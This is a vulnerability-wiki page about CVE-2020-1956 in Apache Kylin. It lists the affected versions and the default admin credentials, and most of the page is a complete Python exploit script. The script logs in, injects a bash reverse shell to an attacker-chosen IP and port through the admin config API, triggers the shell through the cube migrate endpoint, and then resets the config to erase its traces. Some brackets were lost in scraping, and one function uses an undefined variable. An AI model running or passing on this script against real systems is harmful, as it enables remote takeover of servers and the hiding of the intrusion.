PWNWIK.COM
,
Затронутая версия
Apache Kylin 2.3.0 ~ 2.3.2 Apache Kylin 2.4.0 ~ 2.4.1 Apache Kylin 2.5.0 ~ 2.5.2 Apache Kylin 2.6.0 ~ 2.6.5 Apache Kylin 3.0.0-alpha, Apache Kylin 3.0.0-alpha2, Apache Kylin 3.0.0-beta, Apache Kylin 3.0.0, Kylin 3.0.1
После открытия войдите в систему с учетной записью и паролем по умолчанию, и начальный интерфейс будет успешным.
admin/KYLIN
POC
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.tech
import requests
import base64
import sys
def title():
print('+------------------------------------------')
print('+ \03334mPOC_Des: http://wiki.peiqi.tech \0330m')
print('+ \03334mGithub : https://github.com/PeiQi0 \0330m')
print('+ \03334m公众号 : PeiQi文库 \0330m')
print('+ \03334mVersion: Apache Kylin <= 3.0.1 \0330m')
print('+ \03336m使用格式: python3 CVE-2020-1956 \0330m')
print('+ \03336mUrl >>> http://xxx.xxx.xxx.xxx:7070 \0330m')
print('+ \03336mLogin >>> admin:KYLIN(格式为User:Pass) \0330m')
print('+------------------------------------------')
def POC_1(target_url):
login_url = target_url + "/kylin/api/user/authentication"
user_pass = str(input("\03335mPlease input User and Pass\nLogin >>> \0330m"))
Authorization = "Basic " + str((base64.b64encode(user_pass.encode('utf-8'))),'utf-8')
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Authorization": Authorization,
"Cookie": "project=null"
}
try:
response = requests.post(url=login_url, headers=headers, timeout=20)
if "password" not in response.text:
print("\03331mx 账号密码出现错误 \0330m")
sys.exit(0)
else:
print("\03332mo 成功登录,获得JSESSIONID:" + response.cookies"JSESSIONID" + "\0330m")
return response.cookies"JSESSIONID",Authorization
except:
print("\03331mx 漏洞利用失败\0330m")
sys.exit(0)
def POC_2(target_url, cookie, IP, PORT, Authorization):
config_url = target_url + "/kylin/api/admin/config"
key = "kylin.tool.auto-migrate-cube.enabled","kylin.tool.auto-migrate-cube.src-config","kylin.tool.auto-migrate-cube.dest-config"
value = "true","echo;bash -i >& /dev/tcp/{}/{} 0>&1;echo".format(IP, PORT), "shell"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Authorization": Authorization,
"Accept": "application/json, text/plain, */*",
"Content-Type": "application/json;charset=UTF-8",
"Pragma": "no-cache",
"Cookie": "project=null;JSESSIONID="+cookie
}
for i in range(0,3):
data = """{"key":"%s","value":"%s"}""" % (keyi, valuei)
try:
response = requests.put(url=config_url, headers=headers, data=data, timeout=20)
if response.status_code == 200:
print("\03332mo 成功将" + keyi +"设置为" + valuei +"\0330m")
else:
print("\03331mx 设置" + keyi +"为" + valuei +"失败\0330m")
sys.exit(0)
except:
print("\03331mx 漏洞利用失败 \0330m")
sys.exit(0)
def POC_3(target_url, cookie):
print("\03335mo 正在反弹shell......\0330m")
vuln_url = target_url + "/kylin/api/cubes/kylin_sales_cube/learn_kylin/migrate"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Cookie": "project=null;JSESSIONID=" + cookie
}
try:
response = requests.post(url=vuln_url, headers=headers)
POC_4(target_url, cookie)
except:
print("\03331mx 漏洞利用失败 \0330m")
sys.exit(0)
def POC_4(target_url, cookie):
config_url = target_url + "/kylin/api/admin/config"
key = "kylin.tool.auto-migrate-cube.enabled", "kylin.tool.auto-migrate-cube.src-config",
"kylin.tool.auto-migrate-cube.dest-config"
value = "flase", "echo;echo;echo", "None"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Authorization": Authorization,
"Accept": "application/json, text/plain, */*",
"Content-Type": "application/json;charset=UTF-8",
"Pragma": "no-cache",
"Cookie": "project=null;JSESSIONID=" + cookie
}
for i in range(0,3):
data = """{"key":"%s","value":"%s"}""" % (keyi, valuei)
try:
response = requests.put(url=config_url, headers=headers, data=data, timeout=20)
if response.status_code == 200:
print("\03332mo 成功将" + keyi +"设置为" + valuei +"\0330m")
else:
print("\03331mx 设置" + keyi +"为" + valuei +"失败\0330m")
sys.exit(0)
except:
print("\03331mx 漏洞利用失败 \0330m")
sys.exit(0)
print("\03335mo 成功清理痕迹\0330m")
if __name__ == '__main__':
title()
target_url = str(input("\03335mPlease input Attack Url\nUrl >>> \0330m"))
try:
cookie,Authorization = POC_1(target_url)
except:
print("\03331mx 漏洞利用失败 \0330m")
sys.exit(0)
IP = str(input("\03335m请输入监听IP >>> \0330m"))
PORT = str(input("\03335m请输入监听PORT >>> \0330m"))
POC_2(target_url, cookie, IP, PORT, Authorization)
POC_3(target_url, cookie)
免费、自由、人人可编辑的漏洞库--PwnWiki.com
